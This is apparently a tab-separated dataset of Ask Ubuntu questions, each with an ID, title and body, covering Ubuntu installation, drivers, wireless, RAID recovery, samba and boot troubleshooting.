434844	ubuntu touch update packages problem	i 'm trying to update packages on ubuntu touch on nexus 7 2013 edition . it 's saying `` command error '' after downloading the packages but all fail . is this normal behavior ?
434847	unity programs ' toolbar everything is disabled	i installed gnome and kde desktop environments . now i ca n't select things from the programs ' tool bars . i can still use the alt key . i do n't know if this is the issue but some of styles from the kde desktop are now in unity the desktop .
434849	change keyboard layout ( english uk ) on command line to english us	i am using ubuntu 12.04 . the keyboard layout is english us everywhere except for the command line where it works in english uk . terminal also has english us . how do i change the default keyboard layout in command line to english us ? also , i think it might be worth noting here , that when i had installed ubuntu ( dual boot with windows 8 . 1 ) , i had initially set the language as english uk , but later changed it to english us from the system settings .
434852	install ubuntu as a dual system on mac air	http : //www.maketecheasier.com/install-dual-boot-ubuntu-in-macbook-air i followed this article and i have done all steps . to enter the ubuntu , just as this article said , i need : when the grub menu show up , quickly press “e” to edit the entry ( we need to insert the “noapic” flag , else it will lead to kernel panic ) . scroll down to the entry that starts with “vmlinuz” and add “noapic” ( without the quotation ) at the end of the line , just before the closing quotation marks . i found a line like this : linux /boot/vmlinuz-3.11.0-15-generic root=uuid=170c9bd7-3e70-4139-bb41-615ad1377168 ro quiet splash $ vt_handoff so i add the `` noapic '' at the end of this line : linux /boot/vmlinuz-3.11.0-15-generic root=uuid=170c9bd7-3e70-4139-bb41-615ad1377168 ro quiet splash $ vt_handoff noapic then i boot into the ubuntu successfully ! but , only one time ... it means that i did the same `` add noapic '' thing to boot ubuntu to boot the second time , i just got a black screen ... i cant boot into it any more ! it 's so weird ... . why did it work just one time ? ? ? what can i do ?
434853	black boot screen ( cursor only ) as soon as i initialize 3rd card in xorg ( 3x asus r9 290 in ubuntu 12.04 )	this is driving me a little crazy and though i 'll keep working on it , i 'm hoping someone can suggest some possible solutions , as i 'm almost at my wits end here . some background : the system : as rock 970 extreme 4 mb ; 8gb ram ; 3x asus r9290-4gd5 gpus i 'm currently struggling with ubuntu 12.04 32-bit , but i 've tried this on many different variations ( including 64-bit ones ) and all seem to produce the same problem . also , i 'm attempting this with the latest catalyst 13.12 driver , though i 've also tried 13.09 and the latest beta driver . all lead to the same result . now , there are other problems i 've run into , like the drivers needing to be patched ( see here ) , the 2.9 sdk apparently breaking things ( see comments here ) , but i 've done my searching/reading there and found solutions , as you can see . also , i should mention that windows 7 mines on all 3 cards just fine with this setup . so , hardware problems should be out of the question ( i think ) . i 'm just really hell-bent on making this work in linux ! so , the problem : as the title states , as soon as i initialize the 3rd r9 290 in the xorg.conf file , i get a black screen on boot . no response to anything ( including alt+ctrl+f1/f2/esc ) . basically , as i 've deduced , as soon as i run sudo aticonfig -- adapter=all initial -f , i get a black screen on boot , no matter what driver/ubuntu version i 've tried . i 've further deduced that i can revert to a bootable state by running sudo nano /etc/x11/xorg.conf in recovery mode , and deleting the `` busid '' line from one of the `` device '' sections of the file . ( as a strange aside , xorg.conf is read-only locked unless i enable networking before dropping to root . ) aticonfig ( -- lsa / -- odgt ) sees all three cards just fine , but the best i can do is get fglrx ( fglrxinfo ) to see 2 of them ( and thus cgminer will only see two of them ) . here is the view of some ( relevant ) outputs when the system does see 2 cards . also , here are the contents of my xorg.conf file ( this one works fine ) . adding a busid `` pci:6:0:0 '' line to the last device section ( which is what should make fglrx and cgminer see the 3rd card ) seems to be precisely what creates the black screen on boot problem . any ideas ? the solution may be something simple , as admittedly i 'm no linux expert . is it possible that the amd drivers ca n't handle 3 r9 290s ? i do n't think so , as i 'm pretty sure that others have done this ( and more ) successfully in linux , though i 'm not 100 % certain .
434855	can i install ubuntu from one partition on my hardrive to another partition ?	i know this is probably a no , but could i use unetbootin to create a bootable ubuntu live partition on my internal hard drive , then boot from it and install onto a different partition on the same internal hard drive ?
434857	maximum simultaneous connections on desktop vs server ubuntu	do desktop and server versions of ubuntu have different capabilities for simultaneous connections ? in the windows world , windows desktop versions can only support 10 or 15 max tcp/ip connections at the same time vs 1000 's of connections that server versions can maintain . this is important if you want to run a web server like iis or apache . i am going to start using ubuntu for an os for apache to run on . so the question is which ubuntu version ( desktop or server ) would allow more connection or do both versions support the same number of concurrent connections ?
434858	prevent www-data from running scripts and programs	i discovered this little php script that allows you to enter get requests manually from the browser address bar and execute commands . i played around with it and discovered that i could do all kinds of things as www-data , including view the entire directory structure , copy files user accounts , painstakingly write scripts and php files , upload scripts , php files and executable programs , and upload and compile c source code . i played with it on a spare machine that is not reachable from the internet but it got me thinking about what could happen if this code was injected into a webpage ( similar has been done with open source software i 've used in the past ) and wondering about steps that can be taken to lock down a server to prevent it . so , is there any way to prevent www-data from executing commands that would allow these actions on a server , in case it is ever accessed in this manner ?
434859	how to install ubuntu 12.02 on hp g7- 2273ca ?	hi i wonder how to install ubuntu on pavilion g7- 2273ca , i did change the bios boot options , but does n't load from usb ( live cd ) , or should i burn it in to a cd and try it from there ? thank you~ !
434862	help with canon canoscan lide scanned pdf documents	i have just started working with ubuntu for the last 10 days , with the intention to stop using windows permanently . so far it has been awesome . i have replaced almost all my microsoft applications with available ubuntu apps and some help from google docs . i am experiencing a problem with my canon canoscan lide 110 scanner . when i use the scanner in windows 7 , and saved scanned pages of a book as pdf , i can open the pdf scanned page and copy text from it directly to paste at google docs or any libreoffice document . i tried doing the same in ubuntu using the simple scan app . i scanned the page as text in simple scan and saved it as a pdf . however in ubuntu when i open the scanned pdf page , it opens ok , but i can not copy the texts . this is quite important for my workflow , as i am a medical physician and i need to study a lot of books . i would really appreciate it if you can help me with this .
434863	apt-get use different server ?	i keep getting timeouts on the au.archive.ubuntu.com mirror how do i force apt-get to use a different one ? it keeps telling me failed to fetch http : //au.archive.ubuntu.com/ various links 502 internal error - server connection terminated
434864	android ide for ubuntu	are there any other ides other then eclipse for ubuntu which can be used for android development
434865	what happens if a file listed for backup with rsync is in use ?	i have a cron job to rsync certain files from my home folder every hour . would anything bad happen if a file scheduled to be backed up is being edited at the time of backup ? right now , i am avoiding that chance by using another cron job to run two minutes before the backup one to remind me to save open stuff . ( i looked through `` questions that may already have your answer '' and `` similar questions '' before posting but i 'm not seeing a duplicate hence the question . )
434868	wireless hardware lock issues aftre updating	i recently installed ubuntu 12.04 lts on an asus laptop . initially the networking worked with no issues , after installing updates that the os recommended , it now reports that wireless is not available due to a hardware lock on a wireless device . however after closing the lid and opening it again the hardware lock goes away . this is what rfkill reports before closing the lid : 0 : asus-wlan : wireless lan soft blocked : no hard blocked : no 1 : asus-bluetooth : bluetooth soft blocked : yes hard blocked : no 2 : phy0 : wireless lan soft blocked : no hard blocked : yes and after : 0 : asus-wlan : wireless lan soft blocked : no hard blocked : no 1 : asus-bluetooth : bluetooth soft blocked : yes hard blocked : no 2 : phy0 : wireless lan soft blocked : no hard blocked : no any ideas as to how to fix this issue or what could be causing it ?
434869	how to fix `` convert failed - internal error of file system '' while creating a bootable usb stick on osx ?	i am using mac osx 10.4.11 . i am following the ubuntu tutorial `` how to create a bootable usb stick on os x '' . i am stuck in step 3 : $ hdiutil convert -format udrw -o ~/desktop/ubuntu.img ~/desktop/ubuntu.iso it returns the following error : convert failed - internal error of file system . any suggestions ?
434870	is it possible to run ubuntu in nokia xl ? how ?	since nokia xl will be using a forked version of android , is it possible to run ubuntu in nokia xl natively . if this will be possible , is there any way to make it run smoothly on this low end smartphone .
434876	dell laptop screen brightness is not working after upgrade from 12.04 to 13.10	i tried with grub_cmline_linux_default= '' quiet splash acpi_backlight=vendor '' and sudo update-grub but did not worked.please help me out
434880	want to replace windows with ubuntu	if i want to install ubuntu 13.10 [ 64-bit ] in my computer on c : [ which has windows installed in it ] then at the time installation of ubuntu will it format the entire drive ?
434882	up and down keys are not working at the time of booting	i installed ubuntu on the existing d : drive along with windows xp already on the c : drive . when i start the machine , at the time of booting , up and down arrows are not working . so i am unable to run ubuntu and windows xp starts automatically every time . what is the solution ? regards , asim .
434884	ati driver caused grafix problem	i am a brand new user of ubuntu , and do n't know much about the system . recently i installed the fglrx driver and the fglrx-amdcccle driver for my radeon 9200 ati card , and upon reboot got some error gui saying i was in low graphics mode . i could not resolve anything from the given choices , and now can not even login . i am at a black screen that has my user root with ttyl listed and i cant enter my login . i do n't know how to resolve this or even access ubuntu now . i booted into recovery mode and deleted the fglrx drivers via dpkg -- purge fglrx-* but i am still getting the errors , and ca n't log into my machine .
434885	install windows 7 with ubuntu in gpt uefi mode	my computer is running ubuntu on a disk in the markup gpt . ubuntu runs mode uefi ( created fat32 partition and boot loader was set there ) . now i need to install windows 7 as an alternative system for games . install it need in the uefi . i know that if i install windows 7 over ubuntu , the installer will overwrite the boot ubuntu . again i repeat that you need to get everything working in uefi . no bios . how to implement it ? sorry for google translate .
434886	prevent other sudoers to use apt-get command	how can i prevent other sudoers to run apt-get install command ? other commands such as mount and others are ok with them .
434887	how to install ubuntu on my phone alongside android ?	well , i do n't want to install ubuntu touch . i 'd rather want to install ubuntu for android as described in below link on a dual core samsung galaxy core ubuntu for android on ubuntu.com
434888	updating issue with update manager	when i try to update ubuntu 12.04 , i got that message , i m newbie , would you help e : malformed line 42 in source list /etc/apt/sources.list ( dist ) e : the list of sources could not be read . e : the package lists or status file could not be parsed or opened . thanks
434890	my ubuntu vm keeps wanting to reinstall ubuntu !	i 've already installed ubuntu 12.04 in virtual machine but whenever i shut down the machine and open the virtual machine again it keeps asking to install it again ? any idea how to solve this problem ?
434894	why does n't /etc/fstab use xml or json ?	this is more like a general linux / programming question , but i 've been programming for a while , and i 'm used to using a format such as xml or json on any file which is used for configuration purposes . being new to linux , i realized that the first configuration file i bumped into ( /etc/fstab ) uses some sort of table format . so why not xml or json ?
434898	problem on cinnamon keyboard shortcuts	i installed cinnamon on ubunutu 12.04 by terminal . now all keyboard shortcuts work on unity but do not work on cinnamon . for example sound volume up is not active for cinnamon . despite to check cinnamon settings these shortcuts have n't effect .
434899	pointing the default localhost folder to joomla in apache2	please help me to solve this issue as i am new to apache2 . my question is how to point `` localhost '' default /var/www to /var/www/joomla . because whenever i type `` localhost '' in the browser it shows like it works ! but instead of that i want to point that `` localhost '' default to my joomla site folder . even i tried running gksu gedit /etc/apache2/sites-available/site1 through the terminal and point it to my sites but nothing has changed . thanks in advance .
434901	tried ubuntu once , broke it , want to install again -- need specific info on how to ggo about it	i have a 2008/9 hp pavillion dv5 1106-ax with ati mobility radeon hd 3400 ( also known as radeon hd 3400m ) . it came with vista , and i then installed a preview of windows 8 , then another of 8.1 when the preview 's license expired . i installed ubuntu 12.04 lts ( precise ) on this system after windows 8.1 preview 's license expired ( through wubi , other methods were n't working , somehow windows and ubuntu ended up on the same partition despite me making another ) , but could n't get the video drivers to work properly , resulting in slow ui graphics and crashes/weird behaviour in w.i.n.e . after many driver switches , i somehow broke ubuntu , and was forced to go back to windows 8.1 , which crashes often . i wish to try ubuntu once more , but want to do it carefully and properly , with first a multi-boot option so that i can pull out in case of problems . once it works out well , i will wipe the other partition . does anyone know how to go about this properly , particularly regarding my display driver issue ? thanks , ace
434905	so many devices	i 'm a newbie installing ubuntu ( i am currently running 13.10 ) , and i am having a devices issue . i just got an acer c720 chromebook , and initially i decided i would put bodhi linux on it , but after trying to install the os 3 times and getting a bunch of errors ( corrupted bootloader/grub issues , or a missing table ) i decided to get something more tried and true like ubuntu . however , when i tried to boot bodhi i used a flash drive i renamed `` bodhi linux '' . now that i successfully installed ubuntu , i seem to have 7 `` devices '' all named `` bodhi linux '' as well as a few random drives : and i ca n't mount them with `` bad superlock '' : i do n't really know what is going on , but i 'd really like to get rid of all these extra drives . any help is much appreciated !
434907	upgrading drdb tools on ubuntu	i am doing a clustering according to this tutorial , but in the drdb section when installing the service when i want to use this command , sudo drbdadm create-md it says i should upgrading the module but i do n't find any help in google about upgrading drdb tools in ubuntu 12.04 ? ? ? could any one help ?
434911	how to make ubuntu boot first	first my question is not a duplicate of the many questions about that problem . when i turn on my computer it boot directly to windwos without showing the grub menu . so to boot to linux i must do f9 then i choose boot from notbook hard drive and the grub menu show up . thanks for your answers .
434913	installing libgles1-mesa messes up my system	i 'm on ubuntu 12.04 ( 64 bit ) . i did sudo apt-get install libgles1-mesa it totally messed up my system , removed lots needed packets including ubuntu-desktop , my touchpad stopped working ( i had to create files in /etc/modprobe.d to fix it ) , and i can only hope nothing else vital was modified . what is going on here ? did i do something wrong ? or is it a bug ? ( if so , should i report it at ubuntu or mesa lib ? ) these two questions might be related : after installing 'mesa ' , ubuntu does n't start up black screen after installing âmesaâ library
434914	hp bluetooth mouse buttons not working	i have ubuntu 13.10 and have an hp bluetooth mouse x4000b . on connecting , ubuntu recognizes it fine . but it does n't detect mouse clicks ( left or right ) . scroll wheel works though . and i have to connect it manually everytime i boot again . is there a fix ?
434915	do i need to install drivers after installing ubuntu ?	after installing the ubuntu 13.10 operating system on a laptop . do we need to install the drivers , like graphics , audio , network , etc ?
434917	resize gimp 2.8 window on ubuntu 13.10	i had to use gimp for the first time on ubuntu 13.10 a few days ago and its window looks pretty weird . it occupies a full workspace and a third of the workspace below : but it can not be maximised ( note the missing button ) neither can it be resized . how can i adjust the gimp window so that it occupies only one workspace ? thanks . update : the output of sudo aptitude show gimp : package : gimp state : installed automatically installed : no version : 2.8.6-1ubuntu1.1 priority : optional section : graphics maintainer : ubuntu developers < ubuntu-devel-discuss @ lists.ubuntu.com > architecture : amd64 uncompressed size : 15.7 m depends : libgimp2.0 ( > = 2.8.6 ) , libgimp2.0 ( < = 2.8.6-z ) , gimp-data ( > = 2.8.6 ) , gimp-data ( < = 2.8.6-z ) , python-gtk2 ( > = 2.8.0 ) , libgdk-pixbuf2.0-0 ( > = 2.24.1 ) , libaa1 ( > = 1.4p5 ) , libbabl-0.1-0 ( > = 0.1.10 ) , libbz2-1.0 , libc6 ( > = 2.15 ) , libcairo2 ( > = 1.10.2 ) , libdbus-1-3 ( > = 1.0.2 ) , libdbus-glib-1-2 ( > = 0.88 ) , libexif12 , libfontconfig1 ( > = 2.9.0 ) , libfreetype6 ( > = 2.2.1 ) , libgegl-0.2-0 ( > = 0.2.0 ) , libglib2.0-0 ( > = 2.37.3 ) , libgs9 ( > = 8.61.dfsg.1 ) , libgtk2.0-0 ( > = 2.24.10 ) , libgudev-1.0-0 ( > = 146 ) , libjasper1 , libjpeg8 ( > = 8c ) , liblcms1 ( > = 1.15-1 ) , libmng1 ( > = 1.0.10 ) , libpango-1.0-0 ( > = 1.29.4 ) , libpangocairo-1.0-0 ( > = 1.29.4 ) , libpangoft2-1.0-0 ( > = 1.29.4 ) , libpng12-0 ( > = 1.2.13-4 ) , libpoppler-glib8 ( > = 0.18.0 ) , librsvg2-2 ( > = 2.14.4 ) , libtiff5 ( > 4.0.0-1~ ) , libwebkitgtk-1.0-0 ( > = 1.3.10 ) , libwmf0.2-7 ( > = 0.2.8.4 ) , libx11-6 , libxcursor1 ( > 1.1.2 ) , libxext6 , libxfixes3 , libxmu6 , libxpm4 , zlib1g ( > = 1:1.1.4 ) , python : any ( > = 2.7.1-0ubuntu2 ) , python2.7 recommends : ghostscript suggests : gimp-help-en | gimp-help , gimp-data-extras , gvfs-backends , libasound2 conflicts : gimp breaks : gimp-plugin-registry ( < 4.20120506 ) , gimp-plugin-registry ( < 4.20120506 ) replaces : gimp-plugin-registry ( < 4.20120506 ) , gimp-plugin-registry ( < 4.20120506 ) provides : gimp-helpbrowser , gimp-python description : the gnu image manipulation program gimp is an advanced picture editor . you can use it to edit , enhance , and retouch photos and scans , create drawings , and make your own images . it has a large collection of professional-level editing tools and filters , similar to the ones you might find in photoshop . numerous fine-control settings and features like layers , paths , masks , and scripting give you total control over your images . many image file formats are supported , including jpeg , photoshop ( .psd ) , and paint shop pro ( .psp ) files . it can also be used to scan and print photos . to open files remotely ( like over http ) , install the gvfs-backends package . to use a midi device ( like a musical keyboard ) as an input controller in gimp , install libasound2 and read the how-to at /usr/share/doc/gimp/readme.midi homepage : http : //www.gimp.org/
434919	ca n't use wi-fi 13.10 for more than 1 minute	my notebook is dell inspiron 1564 ubuntu 13.10 always i connect on wireless , after 1 minute when i start to browser , these wireless drops until i restart the ubuntu i have 3 wireless points , and both are working , but , i ca n't use there on my ubuntu
434924	i have downloaded the ubuntu using bittorrent but dont know how to install it ?	when i try to download ubuntu from wubi . after intallation i get the option of chossing from win xp and ubuntu but when i select the ubuntu i get an error .
434926	tagging files for later processing	i have an ubuntu server 13.10 . the server exports a directory as a file-server share . the server came with afpd installed by default . i added netatalk myself . when i access the share with an osx client i am able to add tags to the files . osx does this by creating metadata files in the directory . i 'd like to be able to use those tags to flag a file for deletion by the server during the night using eg . a cron-job . are there any tools available that can help me do this ?
434927	problem reinstalling ubuntu 12.04 ( dual with windows 8 ) - black screen	it have been a week since i use ubuntu alongside with windows 8 . yesterday i tried to reinstall ubuntu 12.04 from the cd , i chose the option erase ubuntu 12.04.4 lts and reintall , i followed the installation process as i followed when i installed it for the first time . when the pc restarts , after reinstallation , i had a grub problem so i followed the steps from this webpage howtoubuntu.org/how-to-repair-restore-reinstall-grub-2-with-a-ubuntu-live-cd # .uyvs4jdltiu , i restored the grub . the problem came when i try to enter in ubuntu from the grub , i got a black screen and the message is : kernel panic - not syncing : vfs : unable to mount the root fs on unknown-bloking ( 0,0 ) cpu : 2 pid : 1 comm : swapper/0not tainted 3.11.0-15 generic # 25 pe1-ubuntu hardware name : dell inc. inspiron 5423/0h4mcj . bios a0206/21/201 0000000000008001 ffff8802238addc8 ffffffff8173bc5e 0000000000001 ffffffff81ae6718 ffff8802238ade48 ffffffff8172e8d8 ffff8802236ea ffffffff00000010 ffff8802238ade58 ffff8802238addf8 0000000000017 call trace : [ < ffffffff8173bc5e > ] dump_stack+0x46/0x58 [ < ffffffff8172e8d8 > ] panic+0c1/0x1d7 [ < ffffffff81d263ec > ] mount_block_root+0x17/0x231 [ < ffffffff81d26624 > ] mount_root+0x53/0x57 [ < ffffffff81d26795 > ] prepare_namespace+0x16d/0x1a6 [ < ffffffff81d2610d > ] kernel_int_freeable+0x124/0x131 [ < ffffffff81723be0 > ] ? rest_int+0x80/0x80 [ < ffffffff81723bee > ] kernel_int+0xe/0xf0 [ < ffffffff817508ec > ] ret_from_fork+0x7c/0xb0 [ < ffffffff81723be0 > ] ? rest_int+0x80/0x80 in this moment i can use windows 8 normally , i access from the grub . thanks in advance for any help you are able to provide .
434931	what are virtualization and kvm ?	can anyone explain this : what is virtualization ? what kvm kernel virtual machine ?
434932	wireless driver on cd not working for ubuntu distribution , but in windows it works fine	i have a usb wireless dongle , which is not detected by ubuntu . the drivers that come with the dongle are useless in linux and have major issues with installation . i have tried to install ndiswrapper , but the ndisgtk install fails with the error ndisgtk . i can not install through the store as the ethernet port is dead . when i type in lsusb in terminal i get : 0bda:0179 realtek semiconductor corp is there any way to get the dongle working without the need of internet prior to the dongle working . the system i am running is ubuntu 12.04 32bit .
434934	list closed-source installed applications	is it possible to list all installed applications/packages that are not open source ?
434935	can rtl8723ae card work with airmon-ng ?	i have rtl8723ae wireless card . when i run : airmon-ng start wlan0 it tells me that the chipset is unknown : found 5 processes that could cause trouble . if airodump-ng , aireplay-ng or airtun-ng stops working after a short period of time , you may want to kill ( some of ) them ! pid name 3001 avahi-daemon 3003 avahi-daemon 3083 networkmanager 3179 wpa_supplicant 3810 dhclient process with pid 5523 ( dumpcap ) is running on interface mon0 process with pid 3810 ( dhclient ) is running on interface wlan0 interface chipset driver mon0 unknown rtl8723ae - [ phy0 ] mon1 unknown rtl8723ae - [ phy0 ] mon2 unknown rtl8723ae - [ phy0 ] wlan0 unknown rtl8723ae - [ phy0 ] ( monitor mode enabled on mon3 )
434941	`` open containing folder '' in firefox & chrome does n't highlight the file in nautilus	i wo n't say i am new to ubuntu , but i have been on and off for several years -- although i find myself on ubuntu more than on windows nowadays i still consider myself a newbie . i am currently using 13.10 and i also remember having this issue in 12.04 ls , as well . after i download anything in chrome or firefox . there is this option in the downloads page of the browser ( ctrl+j ) to open the file location . it is `` open containing folder '' in firefox and `` show in folder '' in google chrome . when i click it these links in the downloads page of the browser , the `` downloads '' folder opens as expected , but it still does n't highlight the file in the directory . this becomes extremely painful to find the file especially if you have a ton of files in your downloads folder . of course i can switch to list view and sort the items by date and find the file . however , do n't you guys think it should actually highlight the file when nautilus opens ? it was already posted by some other user a month ago and i think the issue was not addressed properly . ubuntu community forums is it a bug or is this normal and something i have to deal with ? i 'm assuming it 's a bug since the feature sounds pretty basic and its there on windows and os x .
434948	install archlinux package pk2cmd-plus on ubuntu 12.04 64bit	i 'm quite new to linux and ubuntu so please be patient : ) i would like to install the package archlinux package pk2cmd-plus on ubuntu 12.04 64bit to be able to program the microship pic18f24k50 with pickit2 . i believe it is a 32bit program . can i install the package directly somehow ? or do i need to compile it manually , and in that case how ?
434950	disable logon prompt show hostname	per default the login prompt shows % hostname % login : . i do n't want anybody with console access to see the hostname of the server that easily . how to get rid of the hostname there ?
434951	ca n't set resolution higher than 1360x768	i have tried to look up fixes but none of them seems to work my first problem is that my screen is not recognized , it is an aoc 2436vwa 24 '' . out of the box ubuntu could not select a higher resolution out than 1024x768 , then i installed a proprietary driver from nvidia , now i can select up to 1360x768 , i have tried forcing a new resolution using xrandr but it does not seem to work . i am connected via a vga cable .
434955	open containing folder become choose appication in firefox in kubuntu	the title says it all . every time i download something , clicking open containing folder when the download is finished , it says choose application and i do n't know what to do . i use firefox in kubuntu .
434958	setting `` always on visible workspace '' does not work	as i stated in the title , always on visible workspace does not work . it used to , but i think that plugging another monitor ( via hdmi ) changed some options and now , after unplugging - this option does not work . i 've found http : //gregcor.com/2011/05/07/fix-du ... es-are-broken/ but i do n't have desktop/gnome/shell config , so there was no help . do you have some ideas what might have happened ? description : ubuntu 13.10 move to other workspace makes current window dissapear - so i suppose it exists in some other ( virtual ? ) workspace , that actually does n't exist . so i think something in wrong with workspaces ( ! ) . but ctrl+shift+right/left/up/down works all right . it moves window to other workspace . so i suppose the application that moves by `` ctrl+shift+right/left/up/down '' has a proper settings while window manager does not .
434960	software raid 5 disk failure	i 'm going to need some expert help - free beer/coffee to anyone who get 's me on my way ! my system i 'm running ubuntu 11.10 with a 3 disk software raid 5 configuration , with 3tb hard drives , in ext4 format . what i did i recently reviewed the health of the disks in the disk utility , and saw that two of my drives had bad sectors . everything was working fine , but i got a little worried . when i looked at the mdadm -- detail , i could see that one of the drives was in failure , and the raid was running degraded . however , one of the drives with a few failed sectors was in fact not reporting a failure by mdadm . i bought a new hard drive , and followed the steps to replace a failed drive in a raid 5 software configuration . ( i marked the drive as failed , removed it , turned off computer , replaced it , partitioned the new drive , and added it back to the raid ) . the process nearly completed ( i think ) , but when i reviewed mdstat detail again , things looked far worse than they were before . what i have now here is the output of mdstat -- detail /dev/mda127 root @ mediapc : /home/jason # mdadm -- detail /dev/md127 /dev/md127 : version : 1.2 creation time : sun mar 10 08:57:16 2013 raid level : raid5 array size : 5860530176 ( 5589.04 gib 6001.18 gb ) used dev size : 2930265088 ( 2794.52 gib 3000.59 gb ) raid devices : 3 total devices : 3 persistence : superblock is persistent update time : sun mar 16 06:48:06 2014 state : clean , failed active devices : 1 working devices : 2 failed devices : 1 spare devices : 1 layout : left-symmetric chunk size : 512k name : mediapc:127 ( local to host mediapc ) uuid : ffbed825 : f397afb1:86535cd8:64f8c314 events : 373600 number major minor raiddevice state 0 8 1 0 active sync /dev/sda1 1 0 0 1 removed 2 0 0 2 removed 3 8 32 - faulty spare /dev/sdc 4 8 17 - spare /dev/sdb1 my newly added drive ( dev/sdb1 ) was added as a spare . the partition that was reporting some sector issues ( in disk utility ) but was working ok in raid is now reporting as a faulty spare . i 'm pretty sure all/most of the data is still present , i just have no way to get to it . i 'll buy more drives ( external ) if anyone has an idea on how to get my data back , or how to get my raid running again , if at all possible . i wanted to try and fix the sectors on the now-faulty spare drive ( /dev/sdc ) but fsck fails a couple of different ways : root @ mediapc : /home/jason # fsck /dev/sdc fsck from util-linux 2.19.1 fsck : fsck.linux_raid_member : not found fsck : error 2 while executing fsck.linux_raid_member for /dev/sdc or : root @ mediapc : /home/jason # fsck /dev/sdc1 fsck from util-linux 2.19.1 e2fsck 1.41.14 ( 22-dec-2010 ) fsck.ext4 : device or resource busy while trying to open /dev/sdc1 filesystem mounted or opened exclusively by another program ? i tried added both drives back to the array as they are , but both fail to add : root @ mediapc : /home/jason # mdadm -- add /dev/md127 /dev/sdb1 mdadm : can not open /dev/sdb1 : device or resource busy i tried search on way to get fsck to run , but i did n't want to reboot the system until i was sure that was the next correct move . really looking for some expert help . i want my data , and i want to get this raid 5 working - but first and foremost i 'd like the data . thank you in advance . let me know if there is anything else i can provide . regards , jason
434962	autostart couchpotato and sickbeard ubuntu 13.10	i have tried just about every script out there to get couchpotato and sickbeard running as daemons and non of them work ... any help would be much appreciated.. these seem to be the best scripts below but even when i change the variables to match my setup they still do n't start on boot ... does anyone have a working script on ubuntu 13.10 or 13.04 ?
434967	samba error : standard input is not a socket	i find errors in my samba logging : $ cat /var/log/samba/log.smbd smbd version 3.6.18 started . copyright andrew tridgell and the samba team 1992-2011 [ 2014/03/16 12:46:42.804586 , 0 ] smbd/server.c:1128 ( main ) standard input is not a socket , assuming -d option [ 2014/03/16 12:48:59 , 0 ] smbd/server.c:1072 ( main ) smbd version 3.6.18 started . copyright andrew tridgell and the samba team 1992-2011 [ 2014/03/16 12:48:59.684593 , 0 ] smbd/server.c:1128 ( main ) standard input is not a socket , assuming -d option [ 2014/03/16 12:53:33 , 0 ] smbd/server.c:1072 ( main ) smbd version 3.6.18 started . copyright andrew tridgell and the samba team 1992-2011 [ 2014/03/16 12:53:33.518159 , 0 ] smbd/server.c:1128 ( main ) standard input is not a socket , assuming -d option i 've googled for a possible solution , but sofar none have worked . the current settings are : $ grep -e `` ^ [ ^ # ; ] . * '' /etc/samba/smb.conf [ global ] workgroup = workgroup server string = % h dns proxy = no log file = /var/log/samba/log. % m max log size = 1000 syslog = 3 panic action = /usr/share/samba/panic-action % d security = user guest ok = yes guest account = nobody encrypt passwords = true passdb backend = tdbsam obey pam restrictions = yes unix password sync = yes passwd program = /usr/bin/passwd % u passwd chat = *enter\snew\s*\spassword : * % n\n *retype\snew\s*\spassword : * % n\n *password\supdated\ssuccessfully* . pam password change = yes map to guest = bad user load printers = no printing = bsd printcap name = /dev/null usershare allow guests = yes [ homes ] comment = home directories browseable = yes read only = no create mask = 0700 directory mask = 0700 valid users = % s [ share ] path = /srv/array1/share available = yes valid users = % s read only = no browseable = yes public = yes writable = yes i 'd appreciate someone pointing me to the solution . $ uname -a linux boson 3.11.0-18-generic # 32-ubuntu smp tue feb 18 21:11:14 utc 2014 x86_64 x86_64 x86_64 gnu/linux
434969	ubuntu 12.04 login screen problem	as i come to login screen , there shows an ubuntu logo but not the login screen . as soon as i move the mouse cursor , i can see the login screen . this problem occurs randomly . this is not a consistent problem , but it happens at % 90 of my login attempts . after i login , there occurs a distorted image of ubuntu background and then everything goes normal and my desktop shows up . why would that happen ? here is what happens : http : //ubuntuone.com/6wiw2zbeazio5ihem7jxrp ( before i move the cursor ) http : //ubuntuone.com/00rui2prb9hvgkbul2dkmq ( after i move the cursor )
434970	ralink wifi chipsets rt2500usb and rt2760 do not work any more ?	for long i 've been using an rt2500usb wifi chipset on desktop pc , from ubuntu 10.04 till ubuntu 12.04.1 ( or maybe .2 ) without any ( big ) problem . as off 12.04.2 i get very bad connection with this same usb wifi chipset still on the same desktop pc . i 've tried to compile provided by ralink drivers intended for kernel 2.6.x without success . i 've udgraded to 13.04 still does not work well - very very very slow and many many many disconnections . i 've live-tested other distros ( fedora , lxde ) and same slow-downs . now i have another pc - but still featuring ralink wifi pci chipset rt 2760 - with ubuntu 13.10 and it is the same bad joke , very slow wifi and many disconnections . i 've also tried ndiswrapper - still no success . is this a bug - regression - or am i doing wrong ? http : //forum.ubuntu-fr.org/viewtopic.php ? id=1471561 http : //forum.ubuntu-fr.org/viewtopic.php ? pid=15716761 # p15716761
434971	live cd : script doens't work correctly after login	i have a pxe/nfs server ( 192.168.1.10 ) , a client pc and a diskless pc . i installed base ubuntu to client pc . i wrote this script ( update.sh ) to work after login to client pc . server=192.168.1.10 echo `` copying files '' mount $ server : /srv/nfs/updatefiles ~/nfs cp ~/nfs/file.txt ~/texts/ umount ~/nfs echo `` reconfigure ssh '' dpkg-reconfigure openssh-server echo `` completed '' i changed chown and chmod and added permission at the end of the sudoers . sudo chown root : root ~/updatefiles/update.sh sudo chmod 700 ~/updatefiles/update.sh sudo nano /etc/sudoers - hduser all= ( all ) nopasswd : /home/hduser/updatefiles/update.sh i created .bash_profile to invoke this script after login . sudo nano ~/.bash_profile - sudo $ home/updatefiles/update.sh it works correctly after reboot client pc . then i created a linux live cd ( ubuntu.iso ) from client pc with using relinux ( an implement of remastersys ) . i copied ubuntu.iso to nfs server and booted diskless pc via pxe/nfs . i 'm getting this error message after login to diskless pc . copying files mount.nfs : /home/hduser/nfs is busy or already mounted umount.nfs : /home/hduser/nfs : device is busy debconf : dbdriver `` config '' : /var/cache/debconf/config.dat is locked by another process : resource temporarilt unavailable . completed sometimes nfs mount works and sometimes reconfigure ssh works but mostly i 'm getting this error . i added sleep 5 to top of the script to make it work but i got same error message again . it works correctly when i invoke update.sh by hand after login completed . what is causing this error ? thanks for any help .
